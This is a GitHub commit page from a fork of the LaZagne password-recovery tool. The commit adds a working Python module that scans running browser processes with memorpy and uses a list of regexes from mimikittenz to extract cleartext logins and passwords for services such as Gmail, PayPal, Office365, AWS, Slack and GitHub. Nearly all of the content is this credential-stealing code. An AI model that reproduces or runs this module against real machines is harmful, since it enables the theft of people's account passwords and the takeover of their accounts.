forked from AlessandroZ/LaZagne
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
adding new module - browser memory dump
- Loading branch information
1 parent
daf0f25
commit 60a711a
Showing
4 changed files
with
79 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,3 @@ | ||
| [submodule "external/memorpy"] | ||
| path = external/memorpy | ||
| url = https://github.com/n1nj4sec/memorpy.git |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,73 @@ | ||
| #!/usr/bin/env python | ||
| # -*- coding: UTF8 -*- | ||
| # Author: Nicolas VERDIER (contact@n1nj4.eu) | ||
|
|
||
| """ | ||
| This script uses memorpy to dumps cleartext passwords from browser's memory | ||
| It has been tested on both windows 10 and ubuntu 16.04 | ||
| The regex have been taken from the mimikittenz https://github.com/putterpanda/mimikittenz | ||
| """ | ||
| from lazagne.config.moduleInfo import ModuleInfo | ||
| from lazagne.config.write_output import print_debug | ||
| from memorpy import * | ||
|
|
||
| # create a symbolic link on Windows | ||
| # mklink /J memorpy ..\..\..\..\memorpy\memorpy | ||
|
|
||
|
|
||
| #from https://github.com/putterpanda/mimikittenz | ||
| mimikittenz_regex=[ | ||
| ("Gmail","&Email=(?P<Login>.{1,99})?&Passwd=(?P<Password>.{1,99})?&PersistentCookie="), | ||
| ("Dropbox","login_email=(?P<Login>.{1,99})&login_password=(?P<Password>.{1,99})&"), | ||
| ("SalesForce","&display=page&username=(?P<Login>.{1,32})&pw=(?P<Password>.{1,16})&Login="), | ||
| ("Office365","login=(?P<Login>.{1,32})&passwd=(?P<Password>.{1,22})&PPSX="), | ||
| ("MicrosoftOneDrive","login=(?P<Login>.{1,42})&passwd=(?P<Password>.{1,22})&type=.{1,2}&PPFT="), | ||
| ("PayPal","login_email=(?P<Login>.{1,48})&login_password=(?P<Password>.{1,16})&submit=Log\+In&browser_name"), | ||
| ("awsWebServices","&email=(?P<Login>.{1,48})&create=.{1,2}&password=(?P<Password>.{1,22})&metadata1="), | ||
| ("OutlookWeb","&username=(?P<Login>.{1,48})&password=(?P<Password>.{1,48})&passwordText"), | ||
| ("Slack","&crumb=.{1,70}&email=(?P<Login>.{1,50})&password=(?P<Password>.{1,48})"), | ||
| ("CitrixOnline","emailAddress=(?P<Login>.{1,50})&password=(?P<Password>.{1,50})&submit"), | ||
| ("Xero ","fragment=&userName=(?P<Login>.{1,32})&password=(?P<Password>.{1,22})&__RequestVerificationToken="), | ||
| ("MYOB","UserName=(?P<Login>.{1,50})&Password=(?P<Password>.{1,50})&RememberMe="), | ||
| ("JuniperSSLVPN","tz_offset=-.{1,6}&username=(?P<Login>.{1,22})&password=(?P<Password>.{1,22})&realm=.{1,22}&btnSubmit="), | ||
| ("Twitter","username_or_email%5D=(?P<Login>.{1,42})&session%5Bpassword%5D=(?P<Password>.{1,22})&remember_me="), | ||
| ("Facebook","lsd=.{1,10}&email=(?P<Login>.{1,42})&pass=(?P<Password>.{1,22})&(?:default_)?persistent="), | ||
| ("LinkedIN","session_key=(?P<Login>.{1,50})&session_password=(?P<Password>.{1,50})&isJsEnabled"), | ||
| ("Malwr","&username=(?P<Login>.{1,32})&password=(?P<Password>.{1,22})&next="), | ||
| ("VirusTotal","password=(?P<Password>.{1,22})&username=(?P<Login>.{1,42})&next=%2Fen%2F&response_format=json"), | ||
| ("AnubisLabs","username=(?P<Login>.{1,42})&password=(?P<Password>.{1,22})&login=login"), | ||
| ("CitrixNetScaler","login=(?P<Login>.{1,22})&passwd=(?P<Password>.{1,42})"), | ||
| ("RDPWeb","DomainUserName=(?P<Login>.{1,52})&UserPass=(?P<Password>.{1,42})&MachineType"), | ||
| ("JIRA","username=(?P<Login>.{1,50})&password=(?P<Password>.{1,50})&rememberMe"), | ||
| ("Redmine","username=(?P<Login>.{1,50})&password=(?P<Password>.{1,50})&login=Login"), | ||
| ("Github","%3D%3D&login=(?P<Login>.{1,50})&password=(?P<Password>.{1,50})"), | ||
| ("BugZilla","Bugzilla_login=(?P<Login>.{1,50})&Bugzilla_password=(?P<Password>.{1,50})"), | ||
| ("Zendesk","user%5Bemail%5D=(?P<Login>.{1,50})&user%5Bpassword%5D=(?P<Password>.{1,50})"), | ||
| ("Cpanel","user=(?P<Login>.{1,50})&pass=(?P<Password>.{1,50})"), | ||
| ] | ||
|
|
||
| if sys.platform=="win32": | ||
| browser_list=["iexplore.exe", "firefox.exe", "chrome.exe", "opera.exe", "MicrosoftEdge.exe", "microsoftedgecp.exe"] | ||
| else: | ||
| browser_list=["firefox", "iceweasel", "chromium", "chrome"] | ||
|
|
||
| class MemoryDump(ModuleInfo): | ||
| def __init__(self): | ||
| options = {'command': '-m', 'action': 'store_true', 'dest': 'memory_dump', 'help': 'retrieve browsers passwords from memory'} | ||
| ModuleInfo.__init__(self, 'memory_dump', 'memory', options) | ||
|
|
||
| def run(self, software_name = None): | ||
| pwdFound = [] | ||
| for process in Process.list(): | ||
| if process.get('name') in browser_list: | ||
| try: | ||
| mw = MemWorker(pid=process.get('pid')) | ||
| except ProcessException: | ||
| continue | ||
|
|
||
| print_debug('INFO', 'dumping passwords from %s (pid: %s) ...' % (process.get('name'), str(process.get('pid')))) | ||
| for service, regex in mimikittenz_regex: | ||
| for x in mw.mem_search(regex, ftype='groups'): | ||
| pwdFound.append({'URL':service, 'Login': x[0], 'Password': x[1]}) | ||
| return pwdFound | ||
|
|